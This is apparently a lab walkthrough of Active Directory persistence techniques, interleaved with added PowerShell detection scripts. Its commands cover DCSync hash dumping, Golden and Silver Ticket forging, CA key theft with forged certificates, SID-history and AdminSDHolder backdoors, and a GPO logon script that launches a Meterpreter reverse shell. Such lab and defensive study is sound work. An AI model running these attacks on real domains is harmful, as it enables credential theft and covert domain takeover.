Persisting Active Directory - Medium
- Persistence through Credentials
- Persistence through Tickets
- Persistence through Certificates
- Persistence through SID History
- Persistence through Group Membership
- Persistence through ACLs
- Persistence through GPOs
Persistence through Credentials
-
We are given low-privileged creds and DA (Domain Administrator) creds "Administrator:tryhackmewouldnotguess1@" for domain 'ZA'.
-
In large organizations, there are multiple DCs (Domain Controllers) per domain; each DC runs a process called KCC (Knowledge Consistency Checker).
-
KCC generates a replication topology for the AD forest and automatically connects to other DCs via RPC (Remote Procedure Calls) to sync info.
-
This replication process is called DC synchronisation (DCSync); DCs initiate it, and by default members of the Domain Admins group can too, but what actually matters is holding the replication rights (Replicating Directory Changes and Replicating Directory Changes All) on the domain object.
-
For a DCSync attack, we use an account that holds those replication permissions and ask a DC to replicate credential material (NTLM hashes, Kerberos keys) to us; nothing on the DC's disk is touched, which is why this is quieter than copying NTDS.dit.
-
Credentials worth harvesting for persistence include:
- Creds that have local admin rights on several machines
- Service accounts with delegation permissions
- Accounts used for privileged AD services
-
DCSync all:
#ssh into THMWRK1 using DA account
ssh za\\Administrator@thmwrk1.za.tryhackme.loc
C:\Tools\mimikatz_trunk\x64\mimikatz.exe
#load mimikatz
privilege::debug
#dcsync a single account, our low-priv user
lsadump::dcsync /domain:za.tryhackme.loc /user:grace.clarke
#dumps the NTLM hash of our user; compare it against the NTLM hash of the known password to confirm the dump is correct
log sv_dcdump.txt
#enable logging on mimikatz
lsadump::dcsync /domain:za.tryhackme.loc /all
#dumps hash for all users
exit
dir
#the log file has been saved
find /I "SAM Username" sv_dcdump.txt
#recover all usernames
find /I "Hash NTLM" sv_dcdump.txt
#recover all hashes
powershell -ep bypass
#launch powershell
#use Get-Content with Select-String to read the 10 lines above and below a match
Get-Content .\sv_dcdump.txt | Select-String -Pattern krbtgt -Context 10,10
1. What is the Mimikatz command to perform a DCSync for the username of test on the za.tryhackme.loc domain? - lsadump::dcsync /domain:za.tryhackme.loc /user:test
2. What is the NTLM hash associated with the krbtgt user? - 16f9af38fca3ada405386b3b57366082
Persistence through Tickets
-
Golden Tickets are forged TGTs (signed with the krbtgt NTLM hash) and Silver Tickets are forged service tickets (TGS, signed with the target machine account's NTLM hash).
-
The scope of a Silver Ticket is limited to the targeted service on that specific server; a Golden Ticket can be used to request service tickets for anything in the domain.
-
The Blue Team defends against Golden Tickets by rotating the krbtgt password twice (the KDC still accepts tickets signed with the previous key, so a single rotation is not enough). Silver Tickets are less likely to be discovered because the DC never sees a TGT request, and harder to defend against because every machine account password would have to be rotated.
#from the dcsync dump we have the NTLM hash of krbtgt (for a Golden Ticket)
#the same dump holds the NTLM hash of the THMSERVER1$ machine account (for a Silver Ticket against that host)
#the last input is the domain SID; get it with an AD-RSAT cmdlet (Get-ADDomain reports it as DomainSID)
powershell -ep bypass
#we now have the required info to forge tickets
exit
#exit powershell
C:\Tools\mimikatz_trunk\x64\mimikatz.exe
#in mimikatz, generate golden ticket
kerberos::golden /admin:ReallyNotALegitAccount /domain:za.tryhackme.loc /id:500 /sid:S-1-5-21-3885271727-2693558621-2658995185 /krbtgt:16f9af38fca3ada405386b3b57366082 /endin:600 /renewmax:10080 /ptt
#/admin is the username to impersonate; it does not need to exist
#/id is 500, the RID of the default Administrator account
#/sid is the SID of the domain we forge the ticket for
#/krbtgt is the krbtgt NTLM hash used to sign the ticket
#/endin is the ticket lifetime in minutes (600); /renewmax the renewal window in minutes
#/ptt injects the ticket directly into the current session, ready to use
#or generate a silver ticket
kerberos::golden /admin:StillNotALegitAccount /domain:za.tryhackme.loc /id:500 /sid:S-1-5-21-3885271727-2693558621-2658995185 /target:THMSERVER1.za.tryhackme.loc /rc4:4c02d970f7b3da7f8ab6fa4dc77438f4 /service:cifs /ptt
#/target is the hostname of the target server
#/rc4 is the NTLM hash of the target machine account (THMSERVER1$), which signs the service ticket
#/service is the service the ticket is for; CIFS gives file share access
dir \\thmdc.za.tryhackme.loc\c$\
#to verify the golden ticket works
dir \\thmserver1.za.tryhackme.loc\c$\
#or to verify silver ticket
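The notes above leave the domain-SID lookup as "an AD-RSAT cmdlet" and describe the defence only in prose. The PowerShell below is an added example (not from the room) that collects the forging inputs that come from AD rather than from the dump (domain SID, RID 500 SID) and then runs the two blue-team checks that correspond to the defences described: how long ago krbtgt was last rotated, and which machine accounts have not rotated their password within the default 30 days (a forged Silver Ticket for such a host keeps working until it does). It assumes the ActiveDirectory RSAT module is available.

```powershell
# Added example: forging inputs from AD plus the krbtgt / machine-password rotation checks.
# Assumes the AD-RSAT module; run as a domain user (any user can read these attributes).
Import-Module ActiveDirectory

# Domain SID (the /sid value) and the SID of the RID 500 account for kerberos::golden.
# The krbtgt and machine-account NTLM hashes themselves come from the dcsync dump.
function Get-ForgeContext {
    $d = Get-ADDomain
    [pscustomobject]@{
        Domain           = $d.DNSRoot
        DomainSid        = $d.DomainSID.Value
        AdministratorSid = "$($d.DomainSID.Value)-500"
    }
}

# Golden Ticket defence: krbtgt must be rotated twice. If PasswordLastSet is old,
# every ticket forged with the current krbtgt key is still valid.
function Get-KrbtgtRotation {
    $k = Get-ADUser krbtgt -Properties PasswordLastSet
    [pscustomobject]@{
        PasswordLastSet = $k.PasswordLastSet
        AgeDays         = [int]((Get-Date) - $k.PasswordLastSet).TotalDays
    }
}

# Silver Ticket defence: a forged service ticket lives as long as that host's machine
# account password. Machine passwords rotate every 30 days by default; list the ones that did not.
function Get-StaleMachinePasswords {
    param([int]$MaxAgeDays = 30)
    $cutoff = (Get-Date).AddDays(-$MaxAgeDays)
    Get-ADComputer -Filter * -Properties PasswordLastSet |
        Where-Object { $_.PasswordLastSet -lt $cutoff } |
        Select-Object Name, PasswordLastSet |
        Sort-Object PasswordLastSet
}

Get-ForgeContext
Get-KrbtgtRotation
Get-StaleMachinePasswords | Format-Table -AutoSize
```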
1. Which AD account's NTLM hash is used to sign Kerberos tickets? - krbtgt
2. What is the name of a ticket that impersonates a legitimate TGT? - Golden Ticket
3. What is the name of a ticket that impersonates a legitimate TGS? - Silver Ticket
4. What is the default lifetime (in years) of a golden ticket generated by Mimikatz? - 10
Persistence through Certificates
-
We need a valid certificate that can be used for Client Authentication; with it we can request a TGT (PKINIT) regardless of password rotations, so the persistence survives resets. Better still, if we obtain the private key of the root CA (Certificate Authority) certificate, we can sign our own certificates for any principal.
-
The private key of the CA is stored on the CA server; if it is not protected by hardware such as an HSM (Hardware Security Module), it is protected only by the machine DPAPI (Data Protection API), which means a local admin on that server can extract it with tools like mimikatz.
-
Extract private key:
ssh za\\Administrator@thmdc.za.tryhackme.loc
#the CA runs on THMDC, so the key has to be extracted there
mkdir sv
cd sv
#create a working directory for our user
C:\Tools\mimikatz_trunk\x64\mimikatz.exe
#in mimikatz
crypto::certificates /systemstore:local_machine
#list certificates in the machine store of the DC, including the CA cert
#some certs are marked as having a non-exportable private key
#patch CAPI and CNG in memory so mimikatz can export them anyway
privilege::debug
crypto::capi
crypto::cng
#services patched
#export certs
crypto::certificates /systemstore:local_machine /export
exit
dir
#certs are exported in both .pfx (with private key) and .der (public cert only) format
#za-thmdc-ca.pfx, the CA cert together with its private key, is the one of interest
#the exported pfx is protected with the password 'mimikatz'
#copy this pfx to the attacker machine and into the low-priv user's home directory on THMWRK1
- Generate own certs:
#we have the root CA certificate and its private key
#ForgeCert uses them to mint a new certificate, signed by the CA, for any subject/UPN we choose
#in the ssh session on the low-priv machine (THMWRK1)
C:\Tools\ForgeCert\ForgeCert.exe --CaCertPath za-THMDC-CA.pfx --CaCertPassword mimikatz --Subject CN=User --SubjectAltName Administrator@za.tryhackme.loc --NewCertPath fullAdmin.pfx --NewCertPassword Password123
#this generates new cert
#use rubeus to request a TGT using this cert to verify
C:\Tools\Rubeus.exe asktgt /user:Administrator /enctype:aes256 /certificate:fullAdmin.pfx /password:Password123 /outfile:administrator.kirbi /domain:za.tryhackme.loc /dc:10.200.88.101
#we receive TGT
#use mimikatz to load TGT
C:\Tools\mimikatz_trunk\x64\mimikatz.exe
kerberos::ptt administrator.kirbi
#injects the TGT into the current session (pass-the-ticket)
exit
#verify it worked
dir \\THMDC.za.tryhackme.loc\c$\
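Before handing a forged PFX to Rubeus it is worth confirming it actually has what PKINIT needs. The PowerShell below is an added example (not from the room or ForgeCert) that loads a PFX and reports whether it carries a private key, whether its EKU includes Client Authentication, and whether the subjectAltName names the principal we want to become. File names and the password are the ones used in the ForgeCert step above; adjust for your own.

```powershell
# Added example: sanity-check a PFX before using it for PKINIT.
# Assumes the fullAdmin.pfx / Password123 values from the ForgeCert command above.
function Test-ClientAuthPfx {
    param(
        [Parameter(Mandatory)][string]$PfxPath,
        [Parameter(Mandatory)][string]$Password,
        [Parameter(Mandatory)][string]$ExpectedUpn
    )
    $path = (Resolve-Path $PfxPath).Path
    $cert = New-Object System.Security.Cryptography.X509Certificates.X509Certificate2($path, $Password)

    # Extended Key Usage: 1.3.6.1.5.5.7.3.2 is id-kp-clientAuth
    $eku = $cert.Extensions |
        Where-Object { $_ -is [System.Security.Cryptography.X509Certificates.X509EnhancedKeyUsageExtension] }
    $clientAuth = [bool]($eku | ForEach-Object { $_.EnhancedKeyUsages } |
        Where-Object { $_.Value -eq '1.3.6.1.5.5.7.3.2' })

    # subjectAltName (2.5.29.17); Format() renders it as text such as "Principal Name=user@domain"
    $san = $cert.Extensions | Where-Object { $_.Oid.Value -eq '2.5.29.17' }
    $sanText = if ($san) { $san.Format($false) } else { '' }

    [pscustomobject]@{
        Subject       = $cert.Subject
        Issuer        = $cert.Issuer
        NotAfter      = $cert.NotAfter
        HasPrivateKey = $cert.HasPrivateKey
        ClientAuthEku = $clientAuth
        SanText       = $sanText
        UpnPresent    = [bool]($sanText -match [regex]::Escape($ExpectedUpn))
    }
}

Test-ClientAuthPfx -PfxPath .\fullAdmin.pfx -Password 'Password123' -ExpectedUpn 'Administrator@za.tryhackme.loc'
```

The Issuer field should match the subject of the stolen CA certificate; if UpnPresent is false, Rubeus will not be able to map the certificate to the account.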
1. What key is used to sign certificates to prove their authenticity? - private key
2. What application can we use to forge a certificate if we have the CA certificate and private key? - ForgeCert.exe
3. What is the Mimikatz command to pass a ticket from a file with the name of ticket.kirbi? - kerberos::ptt ticket.kirbi
Persistence through SID History
-
SIDs (Security Identifiers) identify security principals; when an account connects to a resource, the SIDs in its access token (its own SID plus those of its groups) decide what it may access.
-
SIDHistory lets an account carry SIDs from a previous domain so that its old access is effectively cloned onto the new account; it is meant for AD migrations, but nothing stops us from adding a SID from the current domain (such as the Domain Admins group SID) to a low-priv account.
-
Forging SID history:
#get ssh session on THMDC using Administrator creds
#get powershell session
powershell -ep bypass
#verify low-priv user has no info in SID history
Get-ADUser grace.clarke -properties sidhistory,memberof
#blank SIDHistory
#get SID of Domain Admins group
#as this is the group to be added in our SID history
Get-ADGroup "Domain Admins"
#now we can use the DSInternals module to patch ntds.dit directly
#ntds.dit is the AD database on the DC where all directory info (including SIDHistory) is stored
Stop-Service -Name ntds -force
#the NTDS service must be stopped before editing the database (this takes the DC offline briefly and is noisy)
Add-ADDBSidHistory -SamAccountName grace.clarke -SidHistory S-1-5-21-3885271727-2693558621-2658995185-512 -DatabasePath C:\Windows\NTDS\ntds.dit
#include SID to add to SID History
Start-Service -Name ntds
#start the service again
#we can now ssh into THMWRK1 with low-priv creds
#and verify our Domain Admin privs
#in powershell
Get-ADUser grace.clarke -Properties sidhistory
#SIDHistory now holds the Domain Admins SID (RID 512) while group membership is unchanged
dir \\thmdc.za.tryhackme.loc\c$
#can be accessed
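The injection above leaves a tell-tale sign: a SIDHistory entry whose domain part is the current domain's own SID, which no migration ever produces. The PowerShell below is an added example (not from the room) that finds every object with a SIDHistory value and flags entries from the current domain or carrying a well-known privileged RID. It assumes the ActiveDirectory RSAT module and generalises beyond the single user in the notes to the whole directory.

```powershell
# Added example: find SIDHistory values that cannot come from a legitimate migration.
# Assumes the AD-RSAT module.
Import-Module ActiveDirectory

function ConvertTo-Sid($raw) {
    # the AD module normally returns SecurityIdentifier objects; handle raw bytes too
    if ($raw -is [byte[]]) { New-Object System.Security.Principal.SecurityIdentifier($raw, 0) }
    else { [System.Security.Principal.SecurityIdentifier]$raw }
}

function Get-SuspiciousSidHistory {
    $domainSid = (Get-ADDomain).DomainSID.Value
    # well-known RIDs that should never appear in anyone's SIDHistory
    $privilegedRids = @{ 500 = 'Administrator'; 512 = 'Domain Admins'; 516 = 'Domain Controllers';
                         518 = 'Schema Admins'; 519 = 'Enterprise Admins' }

    Get-ADObject -LDAPFilter '(sIDHistory=*)' -Properties sAMAccountName, sIDHistory | ForEach-Object {
        $obj = $_
        foreach ($raw in $obj.sIDHistory) {
            $sid = ConvertTo-Sid $raw
            $rid = [int](($sid.Value -split '-')[-1])
            $reasons = @()
            # a SID "migrated" from the domain we are already in is never legitimate
            if ($sid.AccountDomainSid -and $sid.AccountDomainSid.Value -eq $domainSid) { $reasons += 'SameDomainSid' }
            if ($privilegedRids.ContainsKey($rid)) { $reasons += "PrivilegedRid($($privilegedRids[$rid]))" }
            if ($reasons) {
                [pscustomobject]@{
                    Account    = $obj.sAMAccountName
                    SidHistory = $sid.Value
                    Reason     = $reasons -join ','
                }
            }
        }
    }
}

Get-SuspiciousSidHistory | Format-Table -AutoSize
```

Against the scenario above this reports grace.clarke with SidHistory ending in -512 and both reasons set; a real migration shows a different domain prefix and ordinary user or group RIDs.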
1. What AD object attribute is normally used to specify SIDs from the object's previous domain to allow seamless migration to a new domain? - SIDHistory
2. What is the database file on the domain controller that stores all AD information? - ntds.dit
3. What is the PowerShell command to restart the ntds service after we injected our SID history values? - Start-Service -Name ntds
Persistence through Group Membership
-
Privileged groups such as Domain Admins or Enterprise Admins are poor choices for persistence because they are monitored closely; if we want to persist through group membership, we should pick less obvious groups such as:
- An IT Support group, which typically carries rights like force-changing user passwords.
- Groups that grant local administrator rights on hosts.
- Groups with indirect privileges, such as ownership of GPOs.
-
Group nesting is used to build a more organised structure in AD; it also reduces visibility of effective access, because a member several layers down is never shown as a direct member of the privileged group.
-
Persistence through group nesting:
#in powershell session as Administrator
New-ADGroup -Path "OU=IT,OU=People,DC=ZA,DC=TRYHACKME,DC=LOC" -Name "sv Net Group 1" -SamAccountName "sv_nestgroup1" -DisplayName "sv Nest Group 1" -GroupScope Global -GroupCategory Security
#creates new base group to be hidden in People -> IT OU
New-ADGroup -Path "OU=SALES,OU=People,DC=ZA,DC=TRYHACKME,DC=LOC" -Name "sv Net Group 2" -SamAccountName "sv_nestgroup2" -DisplayName "sv Nest Group 2" -GroupScope Global -GroupCategory Security
#creates another group in People -> Sales OU
Add-ADGroupMember -Identity "sv_nestgroup2" -Members "sv_nestgroup1"
#and adds previous group as member
#we can create more subgroups in a similar way
#thus making deeper layers of nesting
#in the 5th layer, we have sv_nestgroup5
#this group is added to Domain Admins group
Add-ADGroupMember -Identity "Domain Admins" -Members "sv_nestgroup5"
Add-ADGroupMember -Identity "sv_nestgroup1" -Members "grace.clarke"
#adds low-priv user to first group
#due to nesting, our low-priv user now has Domain Admin privileges
#we can verify this by listing the file system of thmdc (dir \\thmdc.za.tryhackme.loc\c$)
#check members of Domain Admins group
Get-ADGroupMember -Identity "Domain Admins"
#shows only Administrator and sv_nestgroup5; grace.clarke does not appear without -Recursive
1. What is the term used to describe AD groups that are members of other AD groups? - Group nesting
2. What is the command to add a new member, thmtest, to the AD group, thmgroup? - Add-ADGroupMember -Identity "thmgroup" -Members "thmtest"
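`Get-ADGroupMember -Recursive` flattens the membership but throws away the chain, so it cannot show which nested group grants a user access. The PowerShell below is an added example (not from the room) that walks a group's membership recursively, records the path each non-group member arrives through, and guards against membership loops. It assumes the ActiveDirectory RSAT module; run it against "Domain Admins" to see grace.clarke surface with the five-group chain built above.

```powershell
# Added example: expand group membership recursively and keep the nesting path.
# Assumes the AD-RSAT module.
Import-Module ActiveDirectory

function Get-NestedMemberPaths {
    param(
        [Parameter(Mandatory)][string]$Group,
        [string[]]$Chain = @(),      # groups walked so far, outermost first
        [hashtable]$Seen = @{}       # guards against A -> B -> A loops
    )
    if ($Chain.Count -eq 0) { $Chain = @($Group) }
    foreach ($m in Get-ADGroupMember -Identity $Group) {
        if ($m.objectClass -eq 'group') {
            if ($Seen.ContainsKey($m.distinguishedName)) { continue }
            $Seen[$m.distinguishedName] = $true
            Get-NestedMemberPaths -Group $m.distinguishedName -Chain ($Chain + $m.SamAccountName) -Seen $Seen
        } else {
            [pscustomobject]@{
                Member = $m.SamAccountName
                Class  = $m.objectClass
                Depth  = $Chain.Count          # 1 = direct member of $Group
                Path   = $Chain -join ' -> '
            }
        }
    }
}

# Anything with Depth greater than 1 is invisible to a plain Get-ADGroupMember "Domain Admins"
Get-NestedMemberPaths -Group 'Domain Admins' | Sort-Object Depth -Descending | Format-Table -AutoSize
```

Reviewing the deepest paths first is the quickest way to spot a chain that wanders through unrelated OUs, as the sv_nestgroup chain across the IT and Sales OUs does.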
Persistence through ACLs
-
We can inject into the ACL template that AD uses to generate the permissions of its protected groups; if the blue team removes our access from a group, we get it back the next time the template is reapplied.
-
The template is the AdminSDHolder container, which exists in every AD domain; its ACL (Access Control List) is copied onto all protected groups (Domain Admins, Enterprise Admins, Administrators and the rest) and their members.
-
A process called SDProp takes the ACL of the AdminSDHolder container and applies it to all protected groups every 60 minutes by default; an ACE (Access Control Entry) on AdminSDHolder that grants our user full control therefore ends up on every protected group.
#rdp into THMWRK1 using low-priv creds
#in command prompt
#use runas to start a cmd.exe whose network authentication uses the Administrator creds (/netonly prompts for the password; the local token is unchanged)
runas /netonly /user:Administrator cmd.exe
#this opens another cmd.exe
#in the new cmd.exe
mmc
#opens the Microsoft Management Console
-
In MMC, we can make the following changes:
-
File > Add/Remove Snap-in > Active Directory Users and Computers > Add and OK
-
View > Advanced Features > Enable Advanced Features
-
In the added snap-in, navigate to domain za.tryhackme.loc > System > AdminSDHolder > right-click > Properties > Security
-
Add low-priv user by clicking Add > type low-priv username and click Check Names > OK > Allow on Full Control > Apply and OK
-
-
Now, after up to 60 minutes, the low-priv user will have full control over all Protected Groups; we can make this happen sooner by triggering SDProp ourselves:
#open powershell session
cd C:\Tools
Import-Module .\Invoke-ADSDPropagation.ps1
Invoke-ADSDPropagation
#the script triggers SDProp immediately instead of waiting for the timer
-
Now, reviewing the security permissions of a Protected Group like Domain Admins shows that our user has full control over it.
-
We are still not a member of the Domain Admins group (membership is what the blue team usually watches), but with full control over it we can add our low-priv user whenever needed, and re-add it after a clean-up for as long as the AdminSDHolder ACE remains.
1. What AD group's ACLs are used as a template for the ACLs of all Protected Groups? - AdminSDHolder
2. What AD service updates the ACLs of all Protected Groups to match that of the template? - SDProp
3. What ACL permission allows the user to perform any action on the AD object? - Full Control
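The MMC steps above are hard to audit by hand. The PowerShell below is an added example (not from the room and not the Invoke-ADSDPropagation.ps1 script) that lists every Allow ACE on AdminSDHolder granting write-level rights to a principal outside the small set that holds them by default, and then triggers SDProp by writing the RootDSE operational attribute runProtectAdminGroupsTask on the PDC emulator, which is the documented way to run it on demand on Server 2008 and later. It assumes the ActiveDirectory RSAT module (which provides the AD: drive used by Get-Acl); the allowlist of expected principals is an assumption to review for your own domain.

```powershell
# Added example: audit AdminSDHolder for foreign write ACEs and trigger SDProp by hand.
# Assumes the AD-RSAT module. The expected-principal list is an assumption; adjust per domain.
Import-Module ActiveDirectory

function Get-AdminSDHolderWriteAces {
    $dn  = "CN=AdminSDHolder,CN=System,$((Get-ADDomain).DistinguishedName)"
    $acl = Get-Acl -Path "AD:\$dn"
    # principals that legitimately hold full control on the template
    $expected = '^(NT AUTHORITY\\SYSTEM|BUILTIN\\Administrators|.+\\Domain Admins|.+\\Enterprise Admins)$'
    # rights that let a principal change the object or its security; GenericAll contains them all
    $writeRights = [System.DirectoryServices.ActiveDirectoryRights]'GenericAll, GenericWrite, WriteDacl, WriteOwner, WriteProperty'
    foreach ($ace in $acl.Access) {
        if ($ace.AccessControlType -ne 'Allow') { continue }
        if (($ace.ActiveDirectoryRights -band $writeRights) -eq 0) { continue }
        if ($ace.IdentityReference.Value -match $expected) { continue }
        [pscustomobject]@{
            Identity   = $ace.IdentityReference.Value
            Rights     = $ace.ActiveDirectoryRights
            ObjectType = $ace.ObjectType      # non-empty GUID = right limited to one attribute/right
            Inherited  = $ace.IsInherited
        }
    }
}

function Invoke-SdPropNow {
    # Writing 1 to this RootDSE operational attribute makes the PDC emulator run SDProp immediately
    $pdc = (Get-ADDomain).PDCEmulator
    $rootDse = [ADSI]"LDAP://$pdc/RootDSE"
    $rootDse.Put('runProtectAdminGroupsTask', '1')
    $rootDse.SetInfo()
}

Get-AdminSDHolderWriteAces | Format-Table -AutoSize
# Invoke-SdPropNow    # afterwards re-check "AD:\CN=Domain Admins,CN=Users,..." with Get-Acl: the ACE is copied there
```

WriteProperty hits with a non-empty ObjectType are usually attribute-scoped and benign (several default service groups have them); an ACE with GenericAll or WriteDacl and an empty ObjectType for a regular user is the finding the attack above produces.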
Persistence through GPOs
-
Common GPO persistence techniques:
- Restricted Group Membership
- Logon Script Deployment
-
We can create a GPO linked to the Admins OU that runs a logon script; every time one of those administrators logs on to a host, the script runs as them and hands us a shell.
#in attacker machine
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=persistad lport=4445 -f exe > sv_shell.exe
#create payload
#Windows runs Batch or PowerShell scripts as logon scripts via GPO
#create a Batch script that fetches and runs the payload
echo 'mkdir C:\tmp 2>nul & copy \\za.tryhackme.loc\sysvol\za.tryhackme.loc\scripts\sv_shell.exe C:\tmp\sv_shell.exe && timeout /t 20 && C:\tmp\sv_shell.exe' > sv_script.bat
#single quotes keep the backslashes intact in bash (inside double quotes "\\" collapses to "\" and breaks the UNC path)
#the script creates C:\tmp if needed, copies the binary from the SYSVOL scripts share to the local machine
#then waits 20 seconds before executing the binary
#use scp with the Admin creds to copy both files (binary and batch script) to the SYSVOL scripts directory on the DC
scp sv_shell.exe za\\Administrator@thmdc.za.tryhackme.loc:C:/Windows/SYSVOL/sysvol/za.tryhackme.loc/scripts/
scp sv_script.bat za\\Administrator@thmdc.za.tryhackme.loc:C:/Windows/SYSVOL/sysvol/za.tryhackme.loc/scripts/
#setup listener
msfconsole -q -x "use exploit/multi/handler; set payload windows/x64/meterpreter/reverse_tcp; set LHOST persistad; set LPORT 4445;exploit"
#now we can rdp into THMWRK1
#and inject Administrator creds into runas
#we can open MMC as Administrator now
-
In the MMC window, we have to make the following changes:
-
File > Add Snap-in > Group Policy Management > Add and OK
-
Right-click Admins OU > "Create a GPO in this domain, and Link it here" with name "sv - persisting GPO" > right-click the created policy and select Enforced (so lower-level links cannot block it)
-
Right-click on our policy > Edit (opens Editor window) > under User Configuration > Policies > Windows Settings > scripts (Logon/Logoff) > Right-click Logon > Properties > select Scripts > Add and Browse to SYSVOL directory where our batch & binary files are stored
-
Select Batch file as script > Open and OK > click Apply and OK
-
-
Now, every time one of the administrators logs into any machine, we will get a callback.
-
We can make it tougher for the Blue Team by removing the ability for all Administrators to edit GPOs.
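Both halves of this technique leave artefacts that can be checked from PowerShell: a GPO from which the administrative groups have lost edit rights, and fresh scripts or binaries in the SYSVOL scripts share. The PowerShell below is an added example (not from the room) that reports GPOs where neither Domain Admins nor Enterprise Admins hold an edit permission, together with the full trustee list for context, and lists recently modified script and executable files under the domain's SYSVOL scripts folder. It assumes the GroupPolicy and ActiveDirectory RSAT modules.

```powershell
# Added example: find GPOs stripped of admin edit rights and recent SYSVOL script drops.
# Assumes the GroupPolicy and AD-RSAT modules.
Import-Module GroupPolicy
Import-Module ActiveDirectory

function Get-GpoWithoutAdminEdit {
    $editLevels = @('GpoEdit', 'GpoEditDeleteModifySecurity')
    foreach ($gpo in Get-GPO -All) {
        $perms = Get-GPPermission -Guid $gpo.Id -All
        $adminEdit = $perms | Where-Object {
            $_.Trustee.Name -in @('Domain Admins', 'Enterprise Admins') -and $_.Permission -in $editLevels
        }
        if (-not $adminEdit) {
            [pscustomobject]@{
                DisplayName = $gpo.DisplayName
                Id          = $gpo.Id
                Owner       = $gpo.Owner
                Modified    = $gpo.ModificationTime
                Trustees    = ($perms | ForEach-Object { "$($_.Trustee.Name):$($_.Permission)" }) -join '; '
            }
        }
    }
}

function Get-RecentSysvolScripts {
    param([int]$Days = 30)
    $domain = (Get-ADDomain).DNSRoot
    $cutoff = (Get-Date).AddDays(-$Days)
    # the scripts share is where the batch file and payload above were dropped
    Get-ChildItem -Path "\\$domain\SYSVOL\$domain\scripts" -Recurse -File -Include *.bat, *.cmd, *.ps1, *.vbs, *.exe |
        Where-Object { $_.LastWriteTime -gt $cutoff } |
        Select-Object FullName, LastWriteTime, Length |
        Sort-Object LastWriteTime -Descending
}

Get-GpoWithoutAdminEdit | Format-Table -AutoSize
Get-RecentSysvolScripts | Format-Table -AutoSize
```

A GPO that shows up in the first list with SYSTEM as the only remaining editor is the signature of the Delegation-tab trick; ownership is still recorded on the object, so the Owner column tells you who created it.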
-
Additional persistence techniques:
1. What MMC snap-in can be used to manage GPOs? - Group Policy Management
2. What sub-GPO is used to grant users and groups access to local groups on the hosts that the GPO applies to? - Restricted Groups
3. What tab is used to modify the security permissions that users and groups have on the GPO? - Delegation